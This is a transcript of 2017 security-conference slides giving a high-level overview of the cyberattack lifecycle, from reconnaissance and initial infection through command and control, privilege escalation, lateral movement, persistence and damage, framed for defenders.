Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
26
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5 The Attack Lifecycle – Conquering All Stages of an Attack Erich Mueller Solutions Engineer Cybereason November 10, 2017
-
Upload
north-texas-chapter-of-the-issa -
Category
Internet
-
view
43 -
download
1
Transcript of Ntxissacsc5 blue 4-the-attack_life_cycle_erich_mueller
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
The Attack Lifecycle – Conquering All Stages of an Attack
Erich Mueller
Solutions Engineer
Cybereason
November 10, 2017
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Hunting for the Adversary
2
Innovation (Tough!)
Custom
Development (Challenging)
Botnet, Hacked Server,
Hosting ($20)
Stolen Credit Card ($5)
Obfuscator ($0.05)
Rebuild Code ($0.00)
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Are you under attack?
3
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
External Recon
4
• People/Social Engineering
• Conferences
• Call help desk or admin
• Technology
• External scans
• Buy information & tools on black market
• Business Intelligence
• Trusted relationships
• 3rd party vendors
“Even Rao, a highly experienced cybersecurityresearcher, nearly fell for the scam, as he happened to have recently mailed a package via UPS.”
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Initial Infection
5
• Phishing & spear phishing
• Vulnerability exploit
• Infected USB drive
Lateral Movement
Recon DamageC & CInitial Infection
Privilege EscalationInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Initial Infection: Process Injection
6
Running a procedure as a thread inside another process
• Evasion
• Reading host process memory
• Affecting host process behavior
• Server persistence
Lateral Movement
Recon DamageC & CInitial Infection
Privilege EscalationInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Initial Infection: Fileless Malware
7
Malicious code launches and carries out an infection within a tool or process • Unlike traditional malware
• Doesn’t use a file
• Runs in memory of the deviceExamples of processes/tools
• Legitimate Windows processes
• Windows management interface
• Meterpreter
• Executing remote commands
Recon DamageC &CInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Command & Control
8
Why• Establish and maintain
connection to:• Execute malicious code
• Update malware
• Sending back collected info
• Provide heartbeat to indicate the attack is still alive
How• Legitimate HTTP
• Legitimate DNS request
• Fast Flux
• TOR
• IRC
• Facebook / Twitter / YouTube comments
• Domain Generation AlgorithmPrivilege Escalation
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Command & Control: Domain Generation Algorithm
9
• C&C servers quickly get blacklisted
• DGA generates 1000’s of domains
• Predictable to attacker, unpredictable to security researcher
• One will be C&C
• When C&C domain blacklisted, attacker:
• Selects another generated domain
• Registers it
• Continues attack
Spread Damage
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Privilege Escalation
10
Why
• Gain better persistence
• Cred dump/user impersonation
• Operate under the radar
How• Exploit vulnerabilities
• Command line vulnerability• Process injection
• Leverage improper configurations• Local admin rights for all
users• User lockout policies
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Privilege Escalation: Exploit Windows Vulnerabilities
11
• Windows kernel mode driver vulnerabilities
• Windows task scheduler vulnerabilities
• Vulnerabilities in Windows design• Windows user account control (UAC)
• DLL search order
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Privilege Escalation: Exploit Windows Vulnerabilities
12
• Windows kernel mode driver vulnerabilities
• Windows task scheduler vulnerabilities
• Vulnerabilities in Windows design• Windows user account control (UAC)
• DLL search order
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Internal Reconnaissance
13
Why
• Paint a picture of the IT infrastructure• Who are the administrators?
• What steps get me closer to my target?
• What type of services are running?
• Identify target and a path to the target
How• ARP scanning
• NetBIOS enumeration
• Port scanning
• Credential stealing
Initial infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Recon: Port Scanning
14
• Services use ports to communicate
• HTTP = 80, DNS = 53, etc…
• Attacker scans the subnet to find exposed and exploitable services
Spread DamageC & C DamageInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Recon: Credential Theft
15
• Mimikatz• Windows
Credential Editor• Lazagne
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Lateral Movement
16
Why
• Gain access to target machines• Domain controllers
• OWA
• Persistence
How• Use legitimate tools
maliciously• Pass The Hash/Ticket• Shares• PSExec• RDP• SSH• PowerShell• SCCM
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Lateral Movement: PsExec
17
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
Legitimate use
IT admin runs PsExec to run a process on a remote machine interactively
Malicious use
Attacker runs PsExec with stolen credential hashes to spread their malware through an entire network
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Lateral Movement: PowerShell
18
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
Legitimate use
IT admin runs PowerShell to monitor firewall
Malicious use
Attacker PowerShell with encoded commands to spread malware
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Lateral Movement: Pass-the-Ticket
19
Legitimate authentication: Kerberos
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Lateral Movement: Pass-the-Ticket
20
Malicious use: Pass the Ticket
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Persistence
21
Why
• Establish long term access
• Primary goal is often persistent accessibly
How
• Scheduled tasks
• Autoruns
• Temp files
• Fileless malware
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Damage
22
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
• FTP/SSH
• DNS
• Dropbox
• Pastebin
o Ransomware
o Corporate financials
o Credit card data
o System corruption
Business Profit Sabotage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Are you under attack?
23
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
Total Enterprise PROTECTION
24
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
A Layered Approach to Security
25
NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5
26
Thank you
